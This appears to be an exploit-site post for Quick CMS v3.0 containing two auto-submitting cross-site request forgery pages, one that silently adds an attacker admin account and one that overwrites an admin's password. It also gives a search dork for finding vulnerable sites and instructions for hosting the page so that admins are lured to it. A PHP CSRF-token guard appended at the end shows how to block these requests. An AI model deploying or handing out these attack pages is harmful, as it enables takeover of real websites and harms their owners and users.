#(+) Exploit Title: Quick CMS v3.0 Cross Site Request Forgery (Add Admin User)
#(+) Author: ^Xecuti0n3r
#(+) E-mail: xecuti0n3r()yahoo.com
#(+) Category: Web Apps [XSRF]
#(+) Dork: intext:"Quick.Cms v3.0" inurl:admin.php
#(+) Demo CMS Link: http://opensolution.org/Quick.Cms
#########################################
I'm ^Xecuti0n3r member from Inj3ct0r Team
#########################################
#All you have to do is save the below code as exploit.html
#Then host a website with the exploit.html file. If a person with admin permissions visits the site,
# it will automatically add the attacker as Admin without warning ;)
____________________________________________________________________
____________________________________________________________________
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Quick CMS v3.0 Cross Site Request Forgery (Add Admin User)</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms() {
    var count = 2;
    var i = 0;
    for (i = 0; i < count; i++) {
        document.forms[i].submit();
    }
}
</script>
<H2>Quick CMS v3.0 Cross Site Request Forgery (Add Admin User)</H2>
<form method="POST" name="form0" action="http://site.com/admin.php?p=users-form&iUser=">
<input type="hidden" name="iUser" value=""/>
<input type="hidden" name="sLoginOld" value=""/>
<input type="hidden" name="sOptionList" value="save and go to the list »"/>
<input type="hidden" name="sLogin" value="admin3"/>
<input type="hidden" name="sPass" value="admin2"/>
<input type="hidden" name="sFirstName" value="Admin2"/>
<input type="hidden" name="sLastName" value="Admin2"/>
<input type="hidden" name="sCompanyName" value="ZZZZZ"/>
<input type="hidden" name="sStreet" value="ZZZZZZZZ"/>
<input type="hidden" name="sZipCode" value="99999"/>
<input type="hidden" name="sCity" value="ZZZZZZ"/>
<input type="hidden" name="sPhone" value="9999999993"/>
<input type="hidden" name="sEmail" value="attacker@jojo.com"/>
</form>
</form>
</body>
</html>
EDIT USER:
#All you have to do is save the below code as exploit.html
#Then host a website with the exploit.html file. If a person with admin permissions visits the site,
# it will automatically add the attacker as Admin without warning ;)
____________________________________________________________________
____________________________________________________________________
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Quick CMS v3.0 Cross Site Request Forgery (Edit Existing Admin details)</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms() {
    var count = 2;
    var i = 0;
    for (i = 0; i < count; i++) {
        document.forms[i].submit();
    }
}
</script>
<H2>Quick CMS v3.0 Cross Site Request Forgery (Edit Existing Admin details)</H2>
<form method="POST" name="form0" action="http://site.com/admin.php?p=admins-form">
<input type="hidden" name="iAdmin" value="1"/>
<input type="hidden" name="iLastLogin" value="0"/>
<input type="hidden" name="iBeforeLastLogin" value="0"/>
<input type="hidden" name="sOptionList" value="save and go to the list »"/>
<input type="hidden" name="sLogin" value="demo"/>
<input type="hidden" name="aPrivilagesForm[p-list]" value="1"/>
<input type="hidden" name="aPrivilagesForm[p-form]" value="1"/>
<input type="hidden" name="sPass" value="newpassword"/>
<input type="hidden" name="sName" value="John Doe"/>
<input type="hidden" name="sEmail" value="john@doe.com"/>
<input type="hidden" name="sSignature" value="JD"/>
</form>
</form>
</body>
</html>
########################################################################
(+)Exploit Coded by: ^Xecuti0N3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :)
(+)<3 to : Indian Cyber Army & Indishell Crew
########################################################################
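
A server-side guard of the kind that stops both auto-submitting forms above, as an added example (not code from this advisory or from Quick.Cms). It assumes PHP 7.3+ with a session-based admin login, a hypothetical include at the top of admin.php, a hypothetical hidden field named csrf_token, and the constructed host cms.example.test.

```php
<?php
// Added example: hypothetical CSRF guard, not Quick.Cms code.
// Assumption: included at the top of admin.php, before any form handling.
session_set_cookie_params(['samesite' => 'Strict', 'httponly' => true]); // PHP 7.3+
session_start();

const TRUSTED_HOST = 'cms.example.test'; // constructed value: the site's own host

// One random token per session; every admin form echoes it in a hidden
// field named csrf_token (hypothetical field name).
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True when the browser-supplied Origin (or, failing that, Referer) names our host.
function same_origin(array $server): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, TRUSTED_HOST) === 0;
}

// Reject a POST that lacks the session token or comes from another origin.
// A form auto-submitted from a third-party page cannot read the token.
function csrf_guard(array $server, array $post): void
{
    if (($server['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        return; // assumption: GET requests never change users or admins
    }
    $sent = $post['csrf_token'] ?? '';
    $ok = is_string($sent)
        && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $sent)
        && same_origin($server);
    if (!$ok) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
}

csrf_guard($_SERVER, $_POST);
```

With this in place, the users-form and admins-form POSTs shown above are answered with HTTP 403 because they carry no csrf_token field and their Origin is the third-party page.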